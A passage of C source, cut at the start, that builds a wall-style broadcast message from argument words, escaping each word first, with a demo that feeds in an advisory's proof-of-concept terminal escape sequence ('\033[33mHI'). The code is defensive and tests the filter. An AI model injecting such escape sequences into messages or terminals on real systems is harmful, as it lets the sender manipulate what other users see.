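            tmp[0] = (char)*p;
            n = 1;
        }
        for (size_t i = 0; i < n; i++) {
            if (need + 1 < outsz)          /* leave room for the NUL */
                out[need] = tmp[i];
            need++;
        }
    }
    if (outsz)
        out[need < outsz ? need : outsz - 1] = '\0';
    return need;
}

/* Assemble the broadcast body from argv-style words, space separated, the way
 * wall.c's "Read message from argv[]" loop does, but with each word filtered
 * through copy_careful() first. Returns the length needed, or (size_t)-1 if a
 * single escaped word exceeds the 255-byte scratch buffer. */
size_t build_message(char *const *mvec, int mvecsz, char *out, size_t outsz)
{
    size_t need = 0;
    if (outsz)
        out[0] = '\0';
    for (int i = 0; i < mvecsz; i++) {
        char word[256];
        if (copy_careful(mvec[i], word, sizeof word) >= sizeof word)
            return (size_t)-1;
        size_t room = need < outsz ? outsz - need : 0;
        int w = snprintf(room ? out + need : out, room, "%s%s", word,
                         i < mvecsz - 1 ? " " : "");
        if (w < 0)
            return (size_t)-1;
        need += (size_t)w;
    }
    return need;
}

/* Stand-alone demo on a constructed argv: the PoC argument from the advisory
 * followed by two plain words. */
int main(void)
{
    char *const words[] = { "\033[33mHI", "from", "wall" };
    char line[128];
    build_message(words, 3, line, sizeof line);
    printf("%s\n", line);   /* ^[[33mHI from wall */
    return 0;
}
```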